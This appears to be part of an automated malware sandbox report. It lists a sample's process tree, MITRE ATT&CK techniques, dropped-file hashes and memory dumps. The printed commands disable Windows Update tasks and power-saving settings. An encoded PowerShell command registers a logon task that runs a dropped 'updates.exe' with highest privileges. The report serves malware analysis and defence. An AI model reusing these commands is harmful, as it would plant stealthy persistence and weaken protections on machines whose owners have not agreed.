C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:1960

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:4328

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:4596

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:4344

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:3772

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:5016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:2580

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:352

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:4788

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:5056

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:4428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAbwBuAGUAZAByAGkAdgBlAHMAXAB1AHAAZABhAHQAZQBzAC4AZQB4AGUAIgAnACkAIAA8ACMAbwBiAHAAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGEAcAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAbQBsACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBPAG4AZQBEAHIAaQB2AGUAcwBTAHkAcwB0AGUAbQBzACcAIAAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBqAHYAIwA+ADsA"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2324

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "stopjduuhfz"
2⤵
PID:4936

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:4440

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1c0c0efb0fd521e31049feeec9c37af3

SHA1
d53ef29af3281088cbd783040cca71a39879a600

SHA256
bb0023668a81e7f65d7cde13a002bad8fec5cdb65c45bd801e3bf65e039acbe1

SHA512
28a88c4318d420c7595fd0a6cc047e65d073808fa05363c36423a61c140019b8dcc130764c56695699201c9e170895eb6a2fefa01ab6c7831c80c473e5e058ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
30dc11d4d534297212253e0436522b07

SHA1
5df149d2bad7dc2fc6ffddeb9c32a9c67657b143

SHA256
b60eb56b4c21f7cf63ef50fb3d0e89c7d2080d9c9609f452d91ff8dcd937d043

SHA512
f570c92f76386ad43ad3558e48f9266ef491906ed75cbbc46d6d3ca3999b0cc6fd60dc68e4576abc4fe920f0c9dd8894c3136e9ed670fc27433b03b3b593bc9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
12ce32cdb860ea27c099070bd8739917

SHA1
0316c3dcd8f5926dc125427a2220526e53b2b1c6

SHA256
cea8621365f1e4a19ccdbc46ef431635352d68753fc939f7412df3181080f6bd

SHA512
69da9c85c8068dfcef7267154215047aa3743a80724b60558f22c66237e04b24737d14dea19b7d8d8a7236da32d4fe9b4a48af04f22f61f54c5a69af1bc0ca95

Download Submit
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
Filesize
2.2MB

MD5
d5dfb8447ced11274942ace31b4279d8

SHA1
5a1b36ef9db72321b3d075712a8888bd921a472c

SHA256
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

SHA512
92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

Download Submit
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
Filesize
2.2MB

MD5
d5dfb8447ced11274942ace31b4279d8

SHA1
5a1b36ef9db72321b3d075712a8888bd921a472c

SHA256
5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

SHA512
92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
5KB

MD5
0684960f1127625c7a987862df0a9047

SHA1
8827566f52b386062aee1cb853a91bede04299b2

SHA256
c10285503e78eacbaa3c00e31a8811afbeaaa07049cc650b6ce961164ba497da

SHA512
143cf0a46f6afda8e796eebf3be8e08fbc8c46c45236988ef678aa3f0d1e4ba44130fbd3d63e5abff4e4419f006f378f2a5dc2ef3b152524502c489fa32d2401

Download Submit
memory/352-265-0x0000000000000000-mapping.dmp

Download
memory/516-214-0x0000000000000000-mapping.dmp

Download
memory/616-222-0x0000000000000000-mapping.dmp

Download
memory/684-217-0x0000000000000000-mapping.dmp

Download
memory/908-213-0x0000000000000000-mapping.dmp

Download
memory/1052-159-0x0000000000000000-mapping.dmp

Download
memory/1148-219-0x0000000000000000-mapping.dmp

Download
memory/1156-158-0x0000000000000000-mapping.dmp

Download
memory/1412-223-0x0000000000000000-mapping.dmp

Download
memory/1448-281-0x0000000000000000-mapping.dmp

Download
memory/1528-220-0x0000000000000000-mapping.dmp

Download
memory/1572-309-0x0000000000000000-mapping.dmp

Download
memory/1780-221-0x0000000000000000-mapping.dmp

Download
memory/1880-157-0x0000000000000000-mapping.dmp

Download
memory/1884-308-0x0000000000000000-mapping.dmp

Download
memory/1960-317-0x0000000000000000-mapping.dmp

Download
memory/1996-266-0x0000000000000000-mapping.dmp

Download
memory/2324-270-0x0000000000000000-mapping.dmp

Download
memory/2580-262-0x0000000000000000-mapping.dmp

Download
memory/2708-261-0x0000000000000000-mapping.dmp

Download
memory/2924-155-0x0000000000000000-mapping.dmp

Download
memory/2968-167-0x0000000000000000-mapping.dmp

Download
memory/3016-311-0x0000000000000000-mapping.dmp

Download
memory/3080-207-0x0000000000000000-mapping.dmp

Download
memory/3176-183-0x0000000000000000-mapping.dmp

Download
memory/3256-208-0x0000000000000000-mapping.dmp

Download
memory/3268-224-0x0000000000000000-mapping.dmp

Download
memory/3292-162-0x0000000000000000-mapping.dmp

Download
memory/3640-310-0x0000000000000000-mapping.dmp

Download
memory/3644-164-0x0000000000000000-mapping.dmp

Download
memory/3900-172-0x0000000000000000-mapping.dmp

Download
memory/4004-312-0x0000000000000000-mapping.dmp

Download
memory/4036-179-0x0000000000000000-mapping.dmp

Download
memory/4092-156-0x0000000000000000-mapping.dmp

Download
memory/4164-126-0x00000198F8A40000-0x00000198F8AB6000-memory.dmp

Filesize
472KB

Download
memory/4164-117-0x0000000000000000-mapping.dmp

Download
memory/4164-123-0x00000198F8890000-0x00000198F88B2000-memory.dmp

Filesize
136KB

Download
memory/4180-286-0x0000000000000000-mapping.dmp

Download
memory/4300-280-0x0000000000000000-mapping.dmp

Download
memory/4308-163-0x0000000000000000-mapping.dmp

Download
memory/4328-318-0x0000000000000000-mapping.dmp

Download
memory/4344-321-0x0000000000000000-mapping.dmp

Download
memory/4428-272-0x0000000000000000-mapping.dmp

Download
memory/4440-210-0x0000000000000000-mapping.dmp

Download
memory/4480-209-0x0000000000000000-mapping.dmp

Download
memory/4484-215-0x0000000000000000-mapping.dmp

Download
memory/4488-211-0x0000000000000000-mapping.dmp

Download
memory/4492-180-0x0000000000000000-mapping.dmp

Download
memory/4512-212-0x0000000000000000-mapping.dmp

Download
memory/4524-273-0x0000000000000000-mapping.dmp

Download
memory/4596-320-0x0000000000000000-mapping.dmp

Download
memory/4600-186-0x0000000000000000-mapping.dmp

Download
memory/4652-332-0x000000001C2A0000-0x000000001C2B2000-memory.dmp

Filesize
72KB

Download
memory/4652-322-0x000000001C270000-0x000000001C27A000-memory.dmp

Filesize
40KB

Download
memory/4672-116-0x000000001C220000-0x000000001C43A000-memory.dmp

Filesize
2.1MB

Download
memory/4672-115-0x0000000000040000-0x0000000000274000-memory.dmp

Filesize
2.2MB

Download
memory/4704-264-0x0000000000000000-mapping.dmp

Download
memory/4716-276-0x0000000000000000-mapping.dmp

Download
memory/4736-278-0x0000000000000000-mapping.dmp

Download
memory/4752-271-0x0000000000000000-mapping.dmp

Download
memory/4788-267-0x0000000000000000-mapping.dmp

Download
memory/4796-175-0x0000000000000000-mapping.dmp

Download
memory/4836-268-0x0000000000000000-mapping.dmp

Download
memory/4860-283-0x0000000000000000-mapping.dmp

Download
memory/4868-161-0x0000000000000000-mapping.dmp

Download
memory/4904-285-0x0000000000000000-mapping.dmp

Download
memory/4904-160-0x0000000000000000-mapping.dmp

Download
memory/4912-178-0x0000000000000000-mapping.dmp

Download
memory/4936-327-0x000001BBD64E0000-0x000001BBD64F2000-memory.dmp

Filesize
72KB

Download
memory/4936-329-0x000001BBD6210000-0x000001BBD6221000-memory.dmp

Filesize
68KB

Download
memory/4936-330-0x000001BBD6500000-0x000001BBD6506000-memory.dmp

Filesize
24KB

Download
memory/4964-170-0x0000000000000000-mapping.dmp

Download
memory/5056-269-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads